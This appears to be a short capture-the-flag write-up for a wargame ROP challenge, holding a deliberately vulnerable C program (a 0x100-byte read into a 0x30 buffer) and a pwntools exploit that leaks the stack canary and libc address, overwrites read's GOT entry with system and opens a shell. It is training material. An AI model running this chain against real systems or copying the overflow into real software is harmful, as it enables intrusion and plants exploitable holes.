문제 분석

// Name: rop.c
// Compile: gcc -o rop rop.c -fno-PIE -no-pie

#include <stdio.h>
#include <unistd.h>

int main() {
    char buf[0x30];

    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);

    // Leak canary
    puts("[1] Leak Canary");
    printf("Buf: ");
    read(0, buf, 0x100);
    printf("Buf: %s\n", buf);

    // Do ROP
    puts("[2] Input ROP payload");
    printf("Buf: ");
    read(0, buf, 0x100);

    return 0;
}

Exploit code

from pwn import *

p = process("./rop")
e = ELF("./rop")
libc = ELF("/home/sung/dreamhack/rop/libc-2.27.so")

nop = 0x000000000040055e
system = 0x601030 - 0xc0ca0
binsh = 0x7ffff7f7f5bd

def slog(name, addr): return success(": ".join([name, hex(addr)]))

#Canary_Part
payload = b'A' * 0x39
p.sendafter(b'Buf: ', payload)
p.recvuntil(payload)
canary = u64(b'\00' + p.recv(7))
slog("Canary",canary)

#read Part
read_plt = e.plt['read']
read_got = e.got['read']
puts_plt = e.plt['puts']
pop_rdi = 0x00000000004007f3
pop_rsi_r15 = 0x00000000004007f1

payload = b"A"*0x38 + p64(canary) + b"B"*0x8
payload += p64(pop_rdi) + p64(read_got)
payload += p64(puts_plt)

# read(0, read_got, 0x10)
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi_r15) + p64(read_got) + p64(0)
payload += p64(read_plt)

# read("/bin/sh") == system("/bin/sh")
payload += p64(pop_rdi)
payload += p64(read_got+0x8)
payload += p64(read_plt)

#Finish
p.sendafter("Buf: ", payload)
read = u64(p.recvn(6)+b"\x00"*2)
lb = read - libc.symbols["read"]
system = lb + libc.symbols["system"]
slog("read", read)
slog("libc base", lb)
slog("system", system)
p.send(p64(system)+b"/bin/sh\x00")
p.interactive()